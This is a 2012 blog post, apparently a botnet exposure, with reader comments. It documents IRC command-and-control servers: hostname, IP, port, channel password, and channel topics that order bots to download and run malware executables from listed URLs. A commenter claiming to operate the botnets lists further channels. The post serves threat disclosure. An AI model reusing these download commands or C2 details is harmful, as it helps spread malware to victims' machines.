lucasbaby.no-ip.info (Irc botnets hosted by Canada Montreal Ovh Hosting Inc.)

By I_Post_Ur_Info, October 8, 2012

Resolved lucasbaby.no-ip.info to 142.4.203.95

Server: lucasbaby.no-ip.info
Port: 6969
Channel: #karmie#
Channel password: 1234
Nick: [USA|XP|gjetth]

Topic for #karmie# is: @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe
Topic for #karmie# set by God at Sun Oct 07 13:42:09 2012

Opers:
[Boss] (Anxiety@HaZe.GoV): Anxiety
[Boss] ~#karmie#
[Boss] irc.HaZe.GoV :HaZeNet
[Boss] idle 12:09:34, signon: Mon Oct 08 00:16:30
[Boss] End of WHOIS list.
[Modem] (DaNk@Zombie-52B99B3.mycingular.net): …
[Modem] ~#karmie#
[Modem] irc.HaZe.GoV :HaZeNet
[Modem] idle 11:35:57, signon: Mon Oct 08 00:31:19
[Modem] End of WHOIS list

Channel: #aryan#
Topic for #aryan# is: @dwnload hxxp://216.246.109.218/uploads/1349569663.exe 1
Topic for #aryan# set by God at Sun Oct 07 16:05:17 2012

Opers: Boss again

* - With Great Power, Comes Great Responsibility.
* - 
* - 
* -                        .
* -                       dM
* -                       MMr
* -                      4MMML                  .
* -                      MMMMM.                xf
* -      .              "M6MMM               .MM-
* -       Mh..          +MM5MMM            .MMMM
* -       .MMM.         .MMMMML.          MMMMMh
* -        )MMMh.        MM5MMM         MMMMMMM
* -         3MMMMx.     'MMM3MMf      xnMMMMMM"
* -         '*MMMMM      MMMMMM.     nMMMMMMP"
* -           *MMMMMx    "MMM5M    .MMMMMMM=
* -            *MMMMMh   "MMMMM"   JMMMMMMP
* -              MMMMMM   GMMMM.  dMMMMMM            .
* -               MMMMMM  "MMMM  .MMMMM(        .nnMP"
* -    ..          *MMMMx  MMM"  dMMMM"    .nnMMMMM*
* -     "MMn...     'MMMMr 'MM   MMM"   .nMMMMMMM*"
* -      "4MMMMnn..   *MMM  MM  MMP"  .dMMMMMMM""
* -        ^MMMMMMMMx.  *ML "M .M*  .MMMMMM**"
* -           *PMMMMMMhn. *x > M  .MMMM**""
* -              ""**MMMMhx/.h/ .=*"
* -                       .3P"%....
* -                     nP"     "*MMnx
* - 
* - 
* - This IRC Network belongs to Haze.
* - If you are not authorized to be connected to this server type /disconnect now.
* - 
* - 
* - 
* - irc.HaZe.GoV #HazeNet

 Channel          Users   Topic
 #aryan#          11      [+smntu] @dwnload hxxp://216.246.109.218/uploads/1349569663.exe 1
 #karmie#         7       [+smntMu] @dl 1 hxxp://dl.dropbox.com/u/81040225/raw_out.exe

* There are 1 users and 230 invisible on 1 servers
* 1 :unknown connection(s)
* 17 :channels formed

 Where are the rest of the bots? Try some channel names and find out. Post a comment if you find some.

Note on the files, 1349569663.exe is the Ganja bot that was just posted
raw_out.exe is an AryaN bot, server posted here

Hosting infos: http://whois.domaintools.com/142.4.203.95

Categories: Uncategorized
Tags:

4 Comments

Anonymous - October 9, 2012 at 1:18 am

gg, you found another one of my botnets. still not impressed.

you missed a few important channels

##BoTz## (100+ Asper bots)
#Nix (140 roots… perl IRC bots running on Linux box's)
##NGR (NGR bots)
#AryaN# (AryaN bots)
#test (Few more Linux roots – perl bot)
#|3vbot|# (3v bots)
#karmie# (More Asper bots)
#Albino (More AryaN bots)

I_Post_Ur_Info - October 9, 2012 at 3:02 pm

Thanks for the info. I'll tell you this though, when people say "Offshore host" they generally don't mean Canada. Good luck with all your free domains as well.

    Anonymous - October 9, 2012 at 6:44 pm

    Maybe you shouldn't use domain tools to WHOIS?

    IP: 142.4.203.95
    Decimal: 2382678879
    Hostname: vks25132.ip-142-4-203.net
    ISP: OVH Hosting
    Organization: OVH Hosting
    Services: None detected
    Type: Broadband
    Assignment: Static IP
    Country: Indonesia
    State/Region: Jakarta Raya
    City: Jakarta
    Latitude: -6.1744
    Longitude: 106.8294

    Lol.. looks offshore to me.

I_Post_Ur_Info - October 10, 2012 at 11:02 am

OVH is not offshore. Also, try a trace route.

Comments are closed